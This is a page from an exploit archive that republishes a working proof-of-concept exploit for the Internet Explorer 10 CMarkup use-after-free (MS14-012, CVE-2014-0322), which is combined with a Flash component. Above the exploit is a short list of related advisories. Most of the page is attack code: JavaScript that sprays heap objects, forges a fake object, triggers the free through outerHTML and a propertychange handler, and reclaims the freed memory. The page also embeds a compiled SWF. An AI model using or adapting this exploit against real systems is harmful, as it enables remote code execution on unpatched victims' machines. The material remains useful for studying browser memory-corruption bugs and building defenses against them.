Internet Explorer 10 & Adobe Flash Player (12.0.0.70, 12.0.0.77) - CMarkup Use-After-Free

🗓️ 15 Apr 2014 00:00:00Reported by Jean-Jamil KhalifeType

zdt🔗 0day.today👁 43 Views

Internet Explorer 10 & Adobe Flash Player (12.0.0.70, 12.0.0.77) - CMarkup Use-After-Free vulnerabilit

Reporter	Title	Published	Views	Family All 52
0day.today	MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free	16 Apr 201400:00	–	zdt
Tenable Nessus	Microsoft Internet Explorer 6 through 11 Arbitrary Code Execution	29 Apr 201400:00	–	nessus
Tenable Nessus	MS KB2934088: Vulnerability in Internet Explorer Could Allow Remote Code Execution	20 Feb 201400:00	–	nessus
Tenable Nessus	MS14-012: Cumulative Security Update for Internet Explorer (2925418)	11 Mar 201400:00	–	nessus
ATTACKERKB	CVE-2014-0322	14 Feb 201400:00	–	attackerkb
ATTACKERKB	Microsoft Internet Explorer Use-After-Free Vulnerability	14 Feb 201400:00	–	attackerkb
BDU FSTEC	The vulnerability of the Internet Explorer browser, which allows a malicious actor to execute arbitrary code	5 Jul 201600:00	–	bdu_fstec
Circl	CVE-2014-0322	14 Feb 201410:09	–	circl
CISA KEV Catalog	Microsoft Internet Explorer Use-After-Free Vulnerability	4 May 202200:00	–	cisa_kev
Check Point Advisories	Microsoft Internet Explorer Use-After-Free Code Execution (CVE-2014-0322)	15 Feb 201400:00	–	checkpoint_advisories

<!--
 MS14-012 Internet Explorer CMarkup Use-After-Free
 Vendor Homepage: http://www.microsoft.com
 Version: IE 10
 Date: 2014-03-31
 Exploit Author: Jean-Jamil Khalife
 Tested on: Windows 7 SP1 x64 (fr, en)
 Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)
 Home: http://www.hdwsec.fr
 Blog : http://www.hdwsec.fr/blog/
 MS14-012 / CVE-2014-0322
 
 Generation:
    c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf
 
 E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as
 
-->
 
<html>
<head>
</head>
<body>
 
<script>
 
var g_arr = [];
var arrLen = 0x250;
 
function dword2data(dword)
{
    var d = Number(dword).toString(16);
    while (d.length < 8)
        d = '0' + d;
 
    return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
}
 
function eXpl()
{
    var a=0;
 
    for (a=0; a < arrLen; a++) {
        g_arr[a] = document.createElement('div');
    }
     
    // Build a new object
    var b = dword2data(0x19fffff3);
    while (b.length < 0x360)
    {
        // mov     eax,dword ptr [esi+98h]
        // ...
        // mov     eax,dword ptr [eax+8]
        // and     dword ptr [eax+2F0h],0FFFFFFBFh
        if (b.length == (0x98 / 2))
        {
            b += dword2data(0x1a000010);
        }
        // mov     ecx,dword ptr [edx+94h]
        // mov     eax,dword ptr [ecx+0Ch]
        else if (b.length == (0x94 / 2))
        {
            b += dword2data(0x1a111111);
        }
        // mov     eax,dword ptr [edx+15Ch]
        // mov     ecx,dword ptr [eax+edx*8]
        else if (b.length == (0x15c / 2))
        {
            b += dword2data(0x42424242);
        }
        else
        {
            b += dword2data(0x19fffff3);
        }
    }
     
    var d = b.substring(0, ( 0x340 - 2 )/2);
     
    // trigger
    try{
        this.outerHTML=this.outerHTML
    }
    catch(e){
         
    }
     
    CollectGarbage();
 
    // Replace freed object
    for (a=0; a < arrLen; a++)
    {
        g_arr[a].title = d.substring(0, d.length);
    }
}
 
// Trigger the vulnerability
function trigger()
{
    var a = document.getElementsByTagName("script");
    var b = a[0];
    b.onpropertychange = eXpl;
    var c = document.createElement('SELECT');
    c = b.appendChild(c);
}
 
 
 
</script>
<embed src=AsXploit.swf width="10" height="10"></embed>
</body>
</html>

#  0day.today [2018-01-04]  #

15 Apr 2014 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.92968